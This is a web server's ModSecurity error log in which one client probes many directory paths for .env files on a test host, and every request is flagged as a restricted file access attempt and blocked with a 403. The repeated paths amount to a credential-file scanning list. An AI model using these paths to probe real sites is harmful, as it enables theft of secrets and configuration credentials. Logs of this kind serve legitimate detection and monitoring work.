[Fri Mar 28 00:38:00.692881 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSMQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.693054 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSMQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.746131 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSMgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.746414 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSMgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.746592 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSMgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.799899 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSMwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.800160 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSMwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.800330 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSMwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.854316 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSNAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.854589 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSNAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.854762 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSNAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.908692 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSNQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.908966 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSNQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.909140 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSNQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.962330 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSNgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.962597 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSNgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.962767 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSNgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.016235 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSNwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.016531 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSNwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.016720 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSNwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.071025 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSOAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.071302 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSOAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.071493 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSOAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.124589 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSOQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.124857 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSOQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.125048 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSOQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.178313 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSOgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.178581 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSOgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.178753 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSOgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.231838 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSOwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.232131 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSOwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.232321 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSOwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.285550 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSPAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.285818 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSPAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.286027 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSPAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.339976 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSPQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.340240 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSPQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.340413 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSPQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.394568 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSPgAAAAE"], referer: https://www.google.com/
